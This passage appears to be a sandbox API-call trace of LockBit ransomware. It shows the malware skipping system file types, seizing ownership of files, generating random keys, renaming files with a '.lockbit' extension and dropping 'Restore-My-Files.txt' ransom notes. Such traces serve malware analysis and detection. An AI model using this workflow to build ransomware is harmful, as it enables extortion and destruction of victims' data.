ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb8c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="curtains.png", cAlternateFileName="")) returned 1 [0079.686] lstrcmpiW (lpString1=".", lpString2="curtains.png") returned -1 [0079.686] lstrcmpiW (lpString1="..", lpString2="curtains.png") returned -1 [0079.686] PathFindExtensionW (pszPath="curtains.png") returned=".png" [0079.686] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.686] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.686] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.687] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.687] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.687] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.687] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.688] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.688] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.688] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.688] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.688] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.688] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.688] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.689] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.689] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.689] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.689] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.689] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.689] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="curtains.png") returned 1 [0079.689] lstrcmpiW (lpString1="ntldr", lpString2="curtains.png") returned 1 [0079.689] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="curtains.png") returned 1 [0079.689] lstrcmpiW (lpString1="bootsect.bak", lpString2="curtains.png") returned -1 [0079.689] lstrcmpiW (lpString1="autorun.inf", lpString2="curtains.png") returned -1 [0079.689] lstrcmpiW (lpString1="thumbs.db", lpString2="curtains.png") returned 1 [0079.689] lstrcmpiW (lpString1="iconcache.db", lpString2="curtains.png") returned 1 [0079.689] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.689] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned=".png" [0079.689] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.689] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.689] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.689] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.689] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.690] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.690] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.690] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.690] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.690] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.691] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.691] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.691] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.691] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png.lockbit") returned 74 [0079.691] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.691] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.692] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.692] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.692] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.692] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.692] RtlFreeAnsiString (AnsiString="\\") [0079.692] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.692] malloc (_Size=0x200) returned 0x77d800 [0079.692] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.693] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.693] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.693] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.693] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.693] CloseHandle (hObject=0x3c4) returned 1 [0079.693] free (_Block=0x77d800) [0079.693] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.694] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.694] malloc (_Size=0x40068) returned 0x3df0008 [0079.694] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=47300) returned 1 [0079.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0079.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.695] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0079.695] ReadFile (in: hFile=0x3c4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0079.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.805] malloc (_Size=0xaa) returned 0x1ff1e60 [0079.805] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0079.810] free (_Block=0x1ff1e60) [0079.810] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.810] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.810] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.810] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b52759, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b52759, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b3fb4e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12d98, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_precomp_matte.wmv", cAlternateFileName="")) returned 1 [0079.810] lstrcmpiW (lpString1=".", lpString2="flower_precomp_matte.wmv") returned -1 [0079.810] lstrcmpiW (lpString1="..", lpString2="flower_precomp_matte.wmv") returned -1 [0079.810] PathFindExtensionW (pszPath="flower_precomp_matte.wmv") returned=".wmv" [0079.811] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.811] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.812] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.812] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="flower_precomp_matte.wmv") returned 1 [0079.812] lstrcmpiW (lpString1="ntldr", lpString2="flower_precomp_matte.wmv") returned 1 [0079.812] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="flower_precomp_matte.wmv") returned 1 [0079.812] lstrcmpiW (lpString1="bootsect.bak", lpString2="flower_precomp_matte.wmv") returned -1 [0079.812] lstrcmpiW (lpString1="autorun.inf", lpString2="flower_precomp_matte.wmv") returned -1 [0079.812] lstrcmpiW (lpString1="thumbs.db", lpString2="flower_precomp_matte.wmv") returned 1 [0079.813] lstrcmpiW (lpString1="iconcache.db", lpString2="flower_precomp_matte.wmv") returned 1 [0079.813] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.813] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned=".wmv" [0079.813] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.813] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.813] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.814] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.814] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.814] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.814] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.814] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.814] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv.lockbit") returned 86 [0079.814] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.815] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.816] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.816] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.816] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.816] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.816] RtlFreeAnsiString (AnsiString="\\") [0079.816] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.816] malloc (_Size=0x200) returned 0x77d800 [0079.816] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.816] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.817] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.817] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.817] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.817] CloseHandle (hObject=0x3c4) returned 1 [0079.817] free (_Block=0x77d800) [0079.817] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.818] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.818] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.818] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=77208) returned 1 [0079.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.819] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.826] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.826] malloc (_Size=0xc2) returned 0x1ff1e60 [0079.826] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0079.830] free (_Block=0x1ff1e60) [0079.830] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.830] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.830] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.830] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b52759, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b52759, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b3fb4e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x14cd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_PreComp_MATTE_PAL.wmv", cAlternateFileName="")) returned 1 [0079.830] lstrcmpiW (lpString1=".", lpString2="flower_PreComp_MATTE_PAL.wmv") returned -1 [0079.830] lstrcmpiW (lpString1="..", lpString2="flower_PreComp_MATTE_PAL.wmv") returned -1 [0079.830] PathFindExtensionW (pszPath="flower_PreComp_MATTE_PAL.wmv") returned=".wmv" [0079.830] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned 